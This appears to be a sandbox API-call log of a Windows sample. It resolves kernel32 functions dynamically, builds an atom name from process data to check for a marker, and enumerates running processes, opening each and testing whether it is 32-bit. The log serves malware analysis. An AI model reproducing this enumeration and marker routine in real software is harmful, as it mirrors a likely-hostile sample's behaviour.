	[0074.682] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.682] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.682] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.682] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] GetLastError () returned 0x5
	[0074.683] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.684] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.685] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.686] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetLastError () returned 0x5
	[0074.687] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.687] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.687] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.688] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.688] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.688] CloseHandle (hObject=0x224) returned 1
	[0074.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.689] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.689] CloseHandle (hObject=0x224) returned 1
	[0074.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb30, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.689] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.689] CloseHandle (hObject=0x224) returned 1
	[0074.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0074.739] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.742] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.743] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.747] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.747] CloseHandle (hObject=0x224) returned 1
	[0074.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.747] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.748] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.748] CloseHandle (hObject=0x224) returned 1
	[0074.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.749] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.749] CloseHandle (hObject=0x224) returned 1
	[0074.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.749] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.750] CloseHandle (hObject=0x224) returned 1
	[0074.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.750] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.750] CloseHandle (hObject=0x224) returned 1
	[0074.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.750] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.750] CloseHandle (hObject=0x224) returned 1
	[0074.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7289b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.751] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.751] CloseHandle (hObject=0x224) returned 1
	[0074.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.751] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.751] CloseHandle (hObject=0x224) returned 1
	[0074.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.752] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.752] CloseHandle (hObject=0x224) returned 1
	[0074.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.752] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.752] CloseHandle (hObject=0x224) returned 1
	[0074.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.753] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.753] CloseHandle (hObject=0x224) returned 1
	[0074.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.754] CloseHandle (hObject=0x224) returned 1
	[0074.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.754] CloseHandle (hObject=0x224) returned 1
	[0074.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.755] CloseHandle (hObject=0x224) returned 1
	[0074.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.755] CloseHandle (hObject=0x224) returned 1
	[0074.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e770, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.756] CloseHandle (hObject=0x224) returned 1
	[0074.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.756] CloseHandle (hObject=0x224) returned 1
	[0074.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.757] CloseHandle (hObject=0x224) returned 1
	[0074.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.757] CloseHandle (hObject=0x224) returned 1
	[0074.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728858, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
